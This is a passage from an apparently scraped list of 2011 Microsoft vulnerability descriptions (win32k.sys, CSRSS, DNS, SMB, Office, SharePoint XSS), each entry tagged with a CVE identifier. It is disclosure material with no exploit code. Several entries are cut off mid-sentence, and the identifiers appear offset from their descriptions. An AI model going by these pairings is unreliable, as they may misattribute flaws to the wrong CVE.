gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1983] Use-after-free vulnerability in Microsoft Office 2007 SP2 and SP3, Office 2010 Gold and SP1, and Office for Mac 2011 allows remote attackers to execute arbitrary code via a crafted Word document, aka "Word Use After Free Vulnerability." [CVE-2011-1982] Microsoft Office 2007 SP2, and 2010 Gold and SP1, does not initialize an unspecified object pointer during the opening of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Office Uninitialized Object Pointer Vulnerability." [CVE-2011-1980] Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-1979] Microsoft Visio 2003 SP3 and 2007 SP2 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "Move Around the Block RCE Vulnerability." [CVE-2011-1978] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4 does not properly validate the System.Net.Sockets trust level, which allows remote attackers to obtain sensitive information or trigger arbitrary outbound network traffic via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Socket Restriction Bypass Vulnerability." [CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1972] Microsoft Visio 2003 SP3, 2007 SP2, and 2010 Gold and SP1 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "pStream Release RCE Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1508] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, does not properly manage memory allocations for function pointers, which allows user-assisted remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Function Pointer Overwrite Vulnerability." [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1280] The XML Editor in Microsoft InfoPath 2007 SP2 and 2010 [CVE-2011-1279] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Out of Bounds WriteAV Vulnerability." [CVE-2011-1278] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel WriteAV Vulnerability." [CVE-2011-1277] Microsoft Excel 2002 SP3, Office 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Memory Corruption Vulnerability." [CVE-2011-1276] Buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1275] Microsoft Excel 2002 SP3 [CVE-2011-1274] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1273] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-1272] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1270] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Presentation Buffer Overrun RCE Vulnerability." [CVE-2011-1269] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1253] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.0.60831, does not properly restrict inheritance, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Class Inheritance Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0980] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse Office Art objects, which allows remote attackers to execute arbitrary code via vectors related to a function pointer, aka "Excel Dangling Pointer Vulnerability." [CVE-2011-0979] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0978] Stack-based buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0977] Use-after-free vulnerability in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via malformed shape data in the Office drawing file format, aka "Microsoft Office Graphic Object Dereferencing Vulnerability." [CVE-2011-0976] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 